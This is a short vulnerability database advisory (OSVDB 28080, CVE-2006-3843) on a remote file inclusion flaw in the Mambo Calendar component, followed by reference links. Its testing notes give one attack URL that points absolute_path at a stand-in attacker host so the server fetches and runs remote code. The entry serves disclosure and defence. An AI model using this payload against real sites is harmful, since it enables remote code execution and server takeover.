Calendar for Mambo com_calendar.php absolute_path Variable Remote File Inclusion

2006-07-17T23:38:58
ID OSVDB:28080
Type osvdb
Reporter OSVDB
Modified 2006-07-17T23:38:58

Description

Manual Testing Notes

http://[target]/[path]/components/com_calendar.php?absolute_path=http://[attacker]/evil.txt?

References:

Other Advisory URL: http://www.solpotcrew.org/adv/matdhule-adv-calendar.txt Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0259.html Mail List Post: http://archives.neohapsis.com/archives/bugtraq/2006-07/0289.html CVE-2006-3843 Bugtraq ID: 19027